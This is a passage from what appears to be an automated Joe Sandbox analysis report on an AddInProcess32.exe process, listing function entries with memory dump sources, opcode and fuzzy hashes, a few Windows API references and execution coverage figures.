Instruction Fuzzy Hash: 53113074F103149BCF186BB5556C33E3AE6AB88712F14482DE816D7384EE398C019BD1

Uniqueness

Uniqueness Score: -1.00%

Function 06E6B397 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2516823549.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6e60000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d903afc8e9b2b82118d4470b2fdccf99e6e44955c92a42e181ec4f6c43c07d5f
Instruction ID: 78bad320d038c02b5e0c6dcccb211e5698231882f6e7c101cb4b1d1b9141935d
Opcode Fuzzy Hash: d903afc8e9b2b82118d4470b2fdccf99e6e44955c92a42e181ec4f6c43c07d5f
Instruction Fuzzy Hash: 6F11E771B102158BC704BBBDE89926EB3B6FB88644F804869D049D3340EE389C16C792

Uniqueness

Uniqueness Score: -1.00%

Function 02669CD1 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2475668679.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2660000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e57c1d70d028dc4fe4a1ef5931b8ca7a044d412863ec141aee8a471cfc0b1ae8
Instruction ID: 3ff6467e259052e7997813c6f246e4dd39a73346454cd73928cbbf4c87ce8a57
Opcode Fuzzy Hash: e57c1d70d028dc4fe4a1ef5931b8ca7a044d412863ec141aee8a471cfc0b1ae8
Instruction Fuzzy Hash: 12112030B843081FD7049A7D8C80BAA3FE6EBC9B00F2448AAE504DF396D9749C0687E0

Uniqueness

Uniqueness Score: -1.00%

Function 02666F00 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2475668679.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2660000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddb6854e80b138a1a1304faef538ee7f7d09059bd9148c096f317778d9558cc7
Instruction ID: 342736cd8b9ebe8da3f3962d18f67c29921b4de854d20bd611dc0ee7ef21b683
Opcode Fuzzy Hash: ddb6854e80b138a1a1304faef538ee7f7d09059bd9148c096f317778d9558cc7
Instruction Fuzzy Hash: 4411C1353056129FC7199B25E86853A77A7BF8935571840BDE806DB3A1CF38DC02CB80

Uniqueness

Uniqueness Score: -1.00%

Function 02668C11 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2475668679.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2660000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3205522e6c99a85fe70e5ee71d5e0346d982e7b94ac88c15a521ec5bd7e5a7f
Instruction ID: 243592556c8cdbcdb04758c0b3759cee64a4f280b983bd1e5a53d33a31d7ae0c
Opcode Fuzzy Hash: b3205522e6c99a85fe70e5ee71d5e0346d982e7b94ac88c15a521ec5bd7e5a7f
Instruction Fuzzy Hash: E5213A36B11204DFCB149F68D998AEEB7B6FF8C320F144469E945A7390CB719D11CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00E6D005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2472922755.0000000000E6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e6d000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a3c4793dd24dc4361731ebafd5b28f64c2a249b87837170d8202ab916fe5719
Instruction ID: cfce3304ff4517aef70c5ba1848a1adb439aa4f0bd469f8f63a644f7e0cc145a
Opcode Fuzzy Hash: 3a3c4793dd24dc4361731ebafd5b28f64c2a249b87837170d8202ab916fe5719
Instruction Fuzzy Hash: F621537554D3808FD712CF24D994715BF72EB46318F28C5EAD8498F6A7C33A980ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 02667F89 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2475668679.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2660000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 316dbee31f1ea202d06fe49dcd0844998aba4b1ebb2900aa1106d7f5b0e935e8
Instruction ID: e11b575bc0a41dcf21d8bccbad0dd85468903b35f85d94ee8532af46531eea5b
Opcode Fuzzy Hash: 316dbee31f1ea202d06fe49dcd0844998aba4b1ebb2900aa1106d7f5b0e935e8
Instruction Fuzzy Hash: 0E115B7A6005518FCB05CF2CD488A64B3B1FF4A378F168B61E8288B3A4C375EC15CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0266B551 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2475668679.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2660000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f0863875c4690caae78ad4ba4dfa217acf1ad6a302423a31e880a291f696a26
Instruction ID: bf87b588fa9567644942b6baf2c1887ab67892f328b84f2c57702fb2ebf192e6
Opcode Fuzzy Hash: 9f0863875c4690caae78ad4ba4dfa217acf1ad6a302423a31e880a291f696a26
Instruction Fuzzy Hash: F711E171708259CFC718DF6A98485BEBBEAAF89218F24842BE101D7265DB30CC11CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02669CE8 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2475668679.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2660000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dbb2c3d550f8266b2c3e76d7e9f4d57d3b7b11016203ca9556a573929919add
Instruction ID: 7fbb82e729fe0f60a866124e6246cc65e4f45b33197f7954e90bde7078e07482
Opcode Fuzzy Hash: 5dbb2c3d550f8266b2c3e76d7e9f4d57d3b7b11016203ca9556a573929919add
Instruction Fuzzy Hash: 3C01B570F402085FD704AA7D8D45B6B7BEABBC8B40F204829E509EB394DD71DC0187E0

Uniqueness

Uniqueness Score: -1.00%

Function 02664B40 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2475668679.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2660000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 352adbdcf37fa3b83f9308b227a72acb1dbb885b54841b545eb17dc7bc41972f
Instruction ID: fc04367df647b6b3f6f1dabd6400b98fd08e1434c20841dd3fe738a7bc34fe1c
Opcode Fuzzy Hash: 352adbdcf37fa3b83f9308b227a72acb1dbb885b54841b545eb17dc7bc41972f
Instruction Fuzzy Hash: 1B01C0787002058FD729AE2AD448A7BBBD6EBC9654B108468E1198F388DE21DC058B90

Uniqueness

Uniqueness Score: -1.00%

Function 00E6D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2472922755.0000000000E6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e6d000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: 54d237c1e63dddfc1b561b3f908ee02a3123a10f46a08d37c3be916f4317051d
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: 9B11BE75A48240DFCB11CF50D9D4B15BF61FB84328F28C6A9D8494B266C33AD85ACB51

Uniqueness

Uniqueness Score: -1.00%

Function 0266AC30 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2475668679.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2660000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 303870a3d992bc076b408610d80a0d196bc0e17937c88571c3c82cd1d5b86c30
Instruction ID: a6294f9804b5bce00945b99c764df57c00052001fa877996238983b61c22a876
Opcode Fuzzy Hash: 303870a3d992bc076b408610d80a0d196bc0e17937c88571c3c82cd1d5b86c30
Instruction Fuzzy Hash: 4F01F7327001146B9B059E549814ABF7BABDBC8750F048069F905E3380CA31DD119B90

Uniqueness

Uniqueness Score: -1.00%

Function 00E5D7B9 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2472686714.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e5d000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eaf91dc108209ca74f1334fb940347b4f1fbc3f915377622b84458b2b87e74b4
Instruction ID: b52ff30e4d37718210ecabb27637685f2656afdefb56eb419d4302e4596533e5
Opcode Fuzzy Hash: eaf91dc108209ca74f1334fb940347b4f1fbc3f915377622b84458b2b87e74b4
Instruction Fuzzy Hash: D9012B3100C344DAE7349A25CD84B67FFD8DF45325F28C82AEC086A186C679DC48C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 06E6086E Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2516823549.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6e60000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1aba5a6308f846d99958bf07f2270729a610456dabf2f1315d967ace137aa62
Instruction ID: ac990398e1511049fd1f6a5fdcff37004d0fe0ae0adfc3cd1e019348994ef8d6
Opcode Fuzzy Hash: c1aba5a6308f846d99958bf07f2270729a610456dabf2f1315d967ace137aa62
Instruction Fuzzy Hash: F601D46094E3C95FD343E770D9211987FB19F03144B0541DBC485DF2E7EA690E098792

Uniqueness

Uniqueness Score: -1.00%

Function 0266AC1F Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2475668679.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2660000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 021eaa0081299ee361d83e591ab5c9c6a7fbcf04efb9e84b2324557333faf6bf
Instruction ID: 226cf8a0500ccb2dcd9a0e013b8a0199200d7c64dd50f90a8e2633b79ea55695
Opcode Fuzzy Hash: 021eaa0081299ee361d83e591ab5c9c6a7fbcf04efb9e84b2324557333faf6bf
Instruction Fuzzy Hash: 03012B32604248AFDB02CE55DC14ABB3FAADF85350F048069F904D7251C671DD11DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0266AF68 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2475668679.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2660000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc86fad65b71c6d895498d45a531973b52fa0f177406742e826c37c81f1967e9
Instruction ID: 02d725b42bbda8ef5f36fce626ad65e8b903dd6b17d4e3595d39e4ef6ec8ccb5
Opcode Fuzzy Hash: fc86fad65b71c6d895498d45a531973b52fa0f177406742e826c37c81f1967e9
Instruction Fuzzy Hash: D4F062723005105F87159A6F9458A3AB7EDEFC4A55B1500A9F90AD7361DF71CC028691

Uniqueness

Uniqueness Score: -1.00%

Function 02664B30 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2475668679.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2660000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90becc23353ca8dd90f0caf61967a8edd3aae8df051835c519b3a5e955df9ba5
Instruction ID: b4197e015533883c4f06bbc9388cb9f9911a969819ea6d2fd8b7fce2c12a4714
Opcode Fuzzy Hash: 90becc23353ca8dd90f0caf61967a8edd3aae8df051835c519b3a5e955df9ba5
Instruction Fuzzy Hash: C6F0F6B87041028FD729AE29D458B7D77A7EBC9695F1484AAE109CF385DE218C06C715

Uniqueness

Uniqueness Score: -1.00%

Function 00E5D7B8 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2472686714.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e5d000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47eb003586e7ed3159fcd73e99267bbdc15bf95413086dc104f346fb79d71bd4
Instruction ID: 3055c8d85018ea1ec4ee8c27940748dccb9e87de810dd4a60c3a2c0e32c3b982
Opcode Fuzzy Hash: 47eb003586e7ed3159fcd73e99267bbdc15bf95413086dc104f346fb79d71bd4
Instruction Fuzzy Hash: 20F068714083449AE7248A16DC84B62FFA8EF55725F18C45AED485B286C2759C44CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 02669D91 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2475668679.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2660000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2c7f86bc9b1782f2bcc714ecf9bbe5cec37a6a0afad202cebbfc0e492ae9626
Instruction ID: 4d357c2f2d10ab15ed1199c4a1bb8f78c2e602e2de754c29bb5fd40d8a7ecf06
Opcode Fuzzy Hash: a2c7f86bc9b1782f2bcc714ecf9bbe5cec37a6a0afad202cebbfc0e492ae9626
Instruction Fuzzy Hash: 13F0E27061A665CFC7149B1C944883477E9AF86725F0580BADC44CF3A2CB30EC46DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06E680B0 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2516823549.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6e60000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66261a89ea833623d47865e2fae227d34f212e354b7ce3898a005f62b92385c7
Instruction ID: 5ac8857fdbdf6f7e01e67c9eb968c43ce89b5c510632b797d138f2d10ac352f2
Opcode Fuzzy Hash: 66261a89ea833623d47865e2fae227d34f212e354b7ce3898a005f62b92385c7
Instruction Fuzzy Hash: F0E06D302163408FE3852F74F4284A63B33FF0624936154DEE00AC92C2EB3A9C42CB21

Uniqueness

Uniqueness Score: -1.00%

Function 0266AF58 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2475668679.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2660000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6166ec79db0ec55d7f637bb7042f21ec342105540a244c4e2275e0690f56110b
Instruction ID: 14d204dc2226d6bad4a19161ec1e41710177062c1a0e48956bded159760c7e4f
Opcode Fuzzy Hash: 6166ec79db0ec55d7f637bb7042f21ec342105540a244c4e2275e0690f56110b
Instruction Fuzzy Hash: DDE086B73483005FC325079E74540257766AECA37570545BEEA89D7322CE348C118251

Uniqueness

Uniqueness Score: -1.00%

Function 06E680C0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2516823549.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6e60000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac1728e444a36031b9471016727514d4b984230c9312a6a72429b28f365d5a73
Instruction ID: 73eceabad29fd3d96a85a6585edb81c0e1fe5613b89bf9bc14025a1cdb3380f2
Opcode Fuzzy Hash: ac1728e444a36031b9471016727514d4b984230c9312a6a72429b28f365d5a73
Instruction Fuzzy Hash: AAE0B630221300CBE3546F75E42C53A3767FF4965A35054ADE40A856C1EB3AAC40DA21

Uniqueness

Uniqueness Score: -1.00%

Function 06E608A8 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2516823549.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6e60000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc8b970e2abe4981f090c9e29732f289033b17becbf724043afa7b334bdca818
Instruction ID: 7dbffeb53b60ebf9cf39a6c35c998503e92e11f4500d1f30812f355ed26d5859
Opcode Fuzzy Hash: dc8b970e2abe4981f090c9e29732f289033b17becbf724043afa7b334bdca818
Instruction Fuzzy Hash: 3BD0123091520DEF9B00EFA4DA1156DB7B7EB44244B1045ED9409A7391EA716F049BD0

Uniqueness

Uniqueness Score: -1.00%

Function 0266A7F0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2475668679.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2660000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9271a7a521acb7e72855af7045bcd00a73a5127ff71c6a2396ab1c7820956148
Instruction ID: a5cc60d3b26b428ad0b7a68845f7982f8475d945bdb5d3402e540507f4dbffb4
Opcode Fuzzy Hash: 9271a7a521acb7e72855af7045bcd00a73a5127ff71c6a2396ab1c7820956148
Instruction Fuzzy Hash: F2C012301442098EC601F775FD65569776AEA80310760D570A4090A22EDF7C999D4A90

Uniqueness

Uniqueness Score: -1.00%

Function 02664C60 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2475668679.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2660000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70e5aaa999eafcf14972a673f73e4c1632f4b5bf061024c05352b5f3f8c6b781
Instruction ID: 5103d0675f1bea00e9b4ef2e787f8d2924bcb7bfd63328b495362207a3089a0b
Opcode Fuzzy Hash: 70e5aaa999eafcf14972a673f73e4c1632f4b5bf061024c05352b5f3f8c6b781
Instruction Fuzzy Hash: 3DB012603413401BD70573309C10725361227C6604F94C0D4C0400D4BAC41509435B40

Uniqueness

Uniqueness Score: -1.00%

Function 026645DA Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2475668679.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2660000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 758ee88d3b16a06d11340fa9997278a333318e371030a65b33959984a978de12
Instruction ID: 39af829e969746a7a0c0433aa9b8f920bbb11e13afcac5cd29ec0e68d6fb509f
Opcode Fuzzy Hash: 758ee88d3b16a06d11340fa9997278a333318e371030a65b33959984a978de12
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0266F988 Relevance: 10.3, Strings: 8, Instructions: 315COMMON

Download Yara Rule

Strings

(bq, xrefs: 0266FB66
Hbq, xrefs: 0266FBBC
Hbq, xrefs: 0266FC1B
<R, xrefs: 0266FC2C
<R, xrefs: 0266FBA8
<R, xrefs: 0266FB77
<R, xrefs: 0266FC07
<R, xrefs: 0266FBCD

Memory Dump Source

Source File: 00000004.00000002.2475668679.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2660000_AddInProcess32.jbxd

Similarity

API ID:
String ID: (bq$<R$<R$<R$<R$<R$Hbq$Hbq
API String ID: 0-1142938741
Opcode ID: 0dfefc9479eea29cd17e357d93c04ee645481124a6f01e514fd08f36e0f7ea87
Instruction ID: e7f84c19dd5f9a9519ef9295bcaf241d9a7d55e0415ecae95562c8bd8ac43c2d
Opcode Fuzzy Hash: 0dfefc9479eea29cd17e357d93c04ee645481124a6f01e514fd08f36e0f7ea87
Instruction Fuzzy Hash: A8B17135700515CFC714DF69E49496EB7B6FF88320B2086AAE516DB7A5CB31EC41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02669AE0 Relevance: 5.1, Strings: 4, Instructions: 91COMMON

Download Yara Rule

Strings

Te^q, xrefs: 02669AFB
Te^q, xrefs: 02669B7E
Te^q, xrefs: 02669B13
Te^q, xrefs: 02669B37

Memory Dump Source

Source File: 00000004.00000002.2475668679.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2660000_AddInProcess32.jbxd

Similarity

API ID:
String ID: Te^q$Te^q$Te^q$Te^q
API String ID: 0-2929563283
Opcode ID: 28c50b0d91b1f28323519b5a0f6be1eb89ea0fae74392d6ae6ad9dfa0fb322f5
Instruction ID: f19896caacce847d9ef7550cb38ca70f38792fbeb5a5f1cee562633f02ceca39
Opcode Fuzzy Hash: 28c50b0d91b1f28323519b5a0f6be1eb89ea0fae74392d6ae6ad9dfa0fb322f5
Instruction Fuzzy Hash: 6D317130B1521ADFCB189FADD498A7F76E7BB84714F204429E802AB398CF749C45CB95

Uniqueness

Uniqueness Score: -1.00%

Function 02669AD0 Relevance: 5.1, Strings: 4, Instructions: 83COMMON

Download Yara Rule

Strings

Te^q, xrefs: 02669AFB
Te^q, xrefs: 02669B7E
Te^q, xrefs: 02669B13
Te^q, xrefs: 02669B37

Memory Dump Source

Source File: 00000004.00000002.2475668679.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2660000_AddInProcess32.jbxd

Similarity

API ID:
String ID: Te^q$Te^q$Te^q$Te^q
API String ID: 0-2929563283
Opcode ID: f379983c570e82abc54b386306880a72c04ec2b668336fe1f84120c4405126cc
Instruction ID: ded0f04bdae7b254e0f9f94a36c15220c6b7a80c1af383319dfe9d92ff175e4e
Opcode Fuzzy Hash: f379983c570e82abc54b386306880a72c04ec2b668336fe1f84120c4405126cc
Instruction Fuzzy Hash: 6D218670B1521ADFDB189F68D4986BE77E7BB84315F24042EE802AB394CF748C46CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0266A940 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;^q, xrefs: 0266A972
\;^q, xrefs: 0266A97E
\;^q, xrefs: 0266A94C
\;^q, xrefs: 0266A956

Memory Dump Source

Source File: 00000004.00000002.2475668679.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2660000_AddInProcess32.jbxd

Similarity

API ID:
String ID: \;^q$\;^q$\;^q$\;^q
API String ID: 0-3001612457
Opcode ID: 7693a6f6001671d12f5076a4f6e38d968bff427389b645d5eeee075c0b186bf1
Instruction ID: e55d3d9a8052db57e6dfce9256179a231823c74ecaf7d6f4c67c95bfb4bb3b3a
Opcode Fuzzy Hash: 7693a6f6001671d12f5076a4f6e38d968bff427389b645d5eeee075c0b186bf1
Instruction Fuzzy Hash: 8C01B531B601049FCB188EADC448B3673EAAF88A60B368765D546EF3B4DA31DC41C790

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: AddInProcess32.exePID: 7984, Parent PID: 7272COMMON

Execution Graph

Execution Coverage:	16.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	25.8%
Total number of Nodes:	341
Total number of Limit Nodes:	20

Executed Functions

Function 0042E490 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 212
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL ref: 0042E4DB
GetSystemMetrics.USER32 ref: 0042E4EE
DeleteObject.GDI32 ref: 0042E567
SelectObject.GDI32 ref: 0042E5BF
SelectObject.GDI32 ref: 0042E63E
DeleteObject.GDI32 ref: 0042E67B

Strings

, xrefs: 0042E60A

Memory Dump Source

Source File: 00000008.00000002.2497332581.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd

Similarity

API ID: Object$DeleteSelect$CallbackDispatcherMetricsSystemUser
String ID:
API String ID: 1449868515-3916222277
Opcode ID: cdcee46dbe5c01933f5c67d0f9417cb4207e2463eadee091f064f99895f68389
Instruction ID: 237b744914d1668b7ca527070b6e0f59e336e0c69219183601cf1b0153347b3d
Opcode Fuzzy Hash: cdcee46dbe5c01933f5c67d0f9417cb4207e2463eadee091f064f99895f68389
Instruction Fuzzy Hash: F3D16DB4509780CFE764DF29E58879EBBF0BB89304F40892EE9898B351D7745448CF8A

Uniqueness

Uniqueness Score: -1.00%

Function 0043703B Relevance: 2.6, Strings: 2, Instructions: 123COMMON

Download Yara Rule

Strings

)J, xrefs: 004371DA
G@AB, xrefs: 00437098

Memory Dump Source

Source File: 00000008.00000002.2497332581.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd

Similarity

API ID:
String ID: )J$G@AB
API String ID: 0-866954396
Opcode ID: 5d9e00fcc5b8374e5e51552f1cb060385a0a0dc1083170ec16b767096e3c50d9
Instruction ID: 1612e1008284fb0fa2ef9c47fe005dc987ab723bedbd61c8035428799b18665f
Opcode Fuzzy Hash: 5d9e00fcc5b8374e5e51552f1cb060385a0a0dc1083170ec16b767096e3c50d9
Instruction Fuzzy Hash: E14128B450C3428BE718CF14CA9472BB7F1BB8A708F54991DE1D19B381D37ADC098B9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041D030 Relevance: .3, Instructions: 346COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2497332581.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 885c18e568bc8ebe9bcd922160f9bc390b6b6b5786b4d56ea63153e416bd8da9
Instruction ID: 6b4c3d3c6c4cb70640eb6ad1fddc1947b1017dca8d55341d7fd34d611c2f5126
Opcode Fuzzy Hash: 885c18e568bc8ebe9bcd922160f9bc390b6b6b5786b4d56ea63153e416bd8da9
Instruction Fuzzy Hash: 5E91E1B19043119BD724EF14C8527ABB3F0FF95328F144A1EE89697391E338E951C79A

Uniqueness

Uniqueness Score: -1.00%

Function 0041D3C0 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2497332581.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 7b666eac28cbc94e9fe1601e59fda39d3d9b7ff49d27b210c9f7e7150827608a
Instruction ID: a5bcbfe2dab014601c3ad761515d4ea005974f8fb368cae98b0e23b790a52716
Opcode Fuzzy Hash: 7b666eac28cbc94e9fe1601e59fda39d3d9b7ff49d27b210c9f7e7150827608a
Instruction Fuzzy Hash: C141F5B29006149BC7249F18DC92AB373B0FF56368B095219E8568B3D1F73CE984C3A5

Uniqueness

Uniqueness Score: -1.00%

Function 0041504B Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2497332581.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

